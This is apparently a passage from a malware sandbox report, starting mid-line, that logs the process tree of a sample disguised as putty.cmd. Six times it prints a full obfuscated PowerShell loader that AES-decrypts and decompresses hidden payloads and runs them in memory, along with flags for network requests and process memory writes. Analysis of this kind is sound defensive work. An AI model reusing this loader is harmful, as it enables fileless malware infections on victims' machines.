([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
5⤵
PID:4040

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4836

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4980

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
3⤵
- Suspicious use of WriteProcessMemory
PID:4716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
4⤵
PID:1464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
5⤵
PID:4576

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4064

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3780

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
3⤵
PID:2836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
4⤵
PID:3524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
5⤵
PID:816

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3900

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2104

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
3⤵
PID:888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
4⤵
PID:2116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
5⤵
PID:4484

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4092

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
3⤵
PID:4044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
4⤵
PID:2420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
5⤵
PID:3240

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4808

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1004

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3096

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
3⤵
PID:4128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
4⤵
PID:1256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
5⤵
PID:2732

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2096

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4880

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
3⤵
PID:1992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
4⤵
PID:4348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
5⤵
PID:2104

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:232

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:5036

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
3⤵
PID:2568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
4⤵
PID:4148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
5⤵
PID:3264

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2556

